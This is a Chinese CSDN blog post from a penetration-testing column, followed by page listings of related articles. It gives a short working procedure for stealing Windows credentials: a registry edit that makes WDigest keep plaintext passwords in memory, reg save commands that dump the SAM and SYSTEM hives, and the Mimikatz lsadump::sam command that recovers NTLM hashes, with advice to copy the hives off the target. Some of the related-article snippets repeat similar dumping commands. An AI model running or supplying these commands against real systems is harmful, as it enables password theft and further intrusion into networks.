注册表读取windows hash

最新推荐文章于 2024-03-22 16:16:48 发布
最新推荐文章于 2024-03-22 16:16:48 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lansefly1990/article/details/118363838
版权

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。

cmd修改注册表命令:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

#重启或用户重新登录后可以成功抓取

cmd修改注册表命令:

1、从注册表读取windows hash

reg save hklm\sam e:\test\sam.hive

reg save hklm\system e:\test\system.hive

2、使用Mimikatz读取SAM和SYSTEM文件中的NTLM-HASH

将这两个hive文件放到和Mimikatz同一个目录下,你可将目标机器的这两个文件拖出来到自己机器上尝试

运行mimikatz输入如下命令:

lsadump::sam /sam:sam.hive /system:system.hive

可成功解密administrator密码。

yusec
关注
专栏目录
【kali】28 提权——读取windows本地密码:pwddump、WCE、fgdump、mimikatz
(∪.∪ )...zzz的博客
10-22 4217
这里写自定义目录标题一、 抓包嗅探二、 键盘记录本地密码三、 查看本地缓存密码1. 浏览器查看密码2. 密码恢复工具3. 使用 Pwdump 查看 windows 本地登录密码4. WCE (WINDOWS CREDENTIAL EDITOR)5. fgdump6. mimikatz 一、 抓包嗅探 Windows Wireshark Omnipeek (好多的分析功能 Commview Sniffpass:抓取密码相关的数据包 Linux Tcpdump Wireshark Dsniff:抓取密码相
内网安全之:Windows 密码抓取
f_carey的博客
11-14 4091
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 密码抓取 1 mimikatz 抓取密码 注:在 Windows 系统中抓取 NTLM Hash 或明文密码,必须将权限提升到 System;lsass.exe 进程用于实现 Windows 的安全策略。 利用通过 SAM 和 System 文件获得 NTLM Hash gentilkiw.
注册表读取
11-18
纯的C++没有访问注册表的函数,访问注册表要用系统的API,下面有一个程序,可以获取QQ的安装路径,QQ的安装路径保存在HKEY_LOCAL_MACHINE\SOFTWARE\TENCENT\QQ下的Install里,修改一下应该能帮到你
导出系统注册表Hash的思路整理
fengling132的专栏
05-02 3121
首先使用 administrator权限登录,然后使用 reg来保存注册表中 HKLM下的 SECURITY,SAM,SYSTEM,注意这里必须使用 reg的 save选项,export选项是不行的, reg save hklm\sam sam.hive  reg save hklm\system ystem.hive  reg save hklm\security security.hiv
读取注册表
lanxiaziyi的专栏
08-18 787
程序总是进化的。 参考来源 我在win10 64位下,总是读取失败。 我读的是: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography 下的 MachineGuid。 写的有问题: 1, 里面的 if(ERROR_SUCCESS == ::RegOpenKeyEx(hKey, wstrUrl.c_str(), 0, KEY_QUE...
读取注册表内容
chinayu2007的专栏
08-26 309
#include int main(int argc, char* argv[]) { HKEY hKey; DWORD dwType = REG_SZ; DWORD dwSize = 255;//须指定长度,否则第一次读取RegQueryValueEx不成功,仅返回长度 char data[MAX_PATH]; bool ret;
Windows平台下HASH探测技术分析及源码研究
例如,Windows注册表中存储了大量的系统信息,使用哈希技术可以快速地读取和写入这些信息。此外,Windows的安全机制中也大量使用哈希技术,如密码存储和验证过程中利用哈希函数生成密码的哈希,再与存储在数据库中...
WIN10系统文件HASH校验菜单右键辅助程序。DELPHI无窗口控制台程序以及PIPE技术读取CMD运行结果DEMO(附完整源码)
05-18
1.将压缩包中“Hash鼠标右键-常用版-自编.reg”导入注册表 2.将压缩包中的"Win32\Debug\FileCertutil.exe"拷入“C:\Windows\System32”目录 3.使用时先将要检验的HASH拷入剪切板(选中某个文件的参考HASH,如5de...
Windows 下 Redis 安装与配置 教程
热门推荐
小青龍 的博客
06-14 16万+
Windows下Redis安装与配置教程,Windows下安装Redis的几种方式,msi安装包安装,zip安装包安装。使用SC命令,手动创建Redis服务及注册表服务项,实现Redis服务后台运行及服务自启动。Redis服务配置查看及修改,Redis服务各配置项简要说明。
windows注册表读取
specialsun的专栏
03-13 309
/** *@brief 原生windows api方式读取,处理起来比较麻烦 *调用:RegQuery1(0x80000002,"SYSTEM\\CurrentControlSet\\services\\sysvmsq\\Parameters","msg_max"); */ bool RegQuery1(int pKey,const char *pSubKey,const char...
读取注册表的方法
RainbowPY的博客
11-12 2849
最近在做一些关于注册表的程序,发现原来读取注册表都是大有讲究的,所以就想写一篇文章来记录下来。 一、操作系统 32位的Windows操作系统已经非常罕见了,现在主流的操作系统是64位的Windows。64位的系统为了兼容32位的应用程序,内置了一套模拟32位的子系统,它就是WOW64 (Windows-on-Windows 64-bit)。但是64位系统对于x64和Win32程序是分别对待的,注册表就是一个例子。 二、注册表视图 下面我们分别以x64方式(系统默认)和Win32的方式打开注册表编辑器
C++/C读取注册表
ab1271173712的博客
11-21 1817
#include "stdafx.h" #include <iostream> #include <windows.h> #include <string> using namespace std; int _tmain(int argc, _TCHAR* argv[]) {  HKEY retKey;  LONG ret;  char retKeyVal[M...
获取本机 hash(注册表)
weixin_30562507的博客
05-11 298
Windows 2000:regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” Windows 2003:reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg 注意权限问题,一般注册表默认sam目...
Windwos密码导出的几种姿势
Matthew
09-14 1万+
这篇文章主要是介绍怎么在本地提取用户密码,把知识整理了一下,把知识整理起来的威力还是挺大的。以下的方式分为要免杀和不需要免杀的方式。文章介绍的技术具有一定的攻击性,主要用于学习。 要免杀: 1.Getapss Getapss是由闪电小子根据mimikatz编译的一个工具,可以获取明文密码。现在有32位和64位了,直接运行getpass.exe。 2.QuarksPwDu
windows获取hash常见手法,你知道吗?
最新发布
logic1001的博客
03-22 1637
有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!适用于Windows 8.1 和 Windows Server 2012 R2 之前Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储可以读到hash所有我们要修改注册表将 UseLogonCredential 设置为 1 然后重启再用猕猴桃就可以获取到密码了。
破解Windows本地账户密码(拿到明文密码)
zhangkexin3的博客
01-26 1285
破解Windows本地账户密码
Windows密码凭证获取学习
crowsec
08-08 4727
一般来说,在我们获取到Windows的system权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。...
Windows下通过右键校验文件MD5完整性的方法
该功能通过修改Windows注册表实现,安装脚本将特定的右键菜单项添加到注册表中,使得用户在文件夹上点击右键时,可以看到新增的校验MD5选项。这种方式大大简化了文件完整性校验的流程,尤其适用于IT管理人员、软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值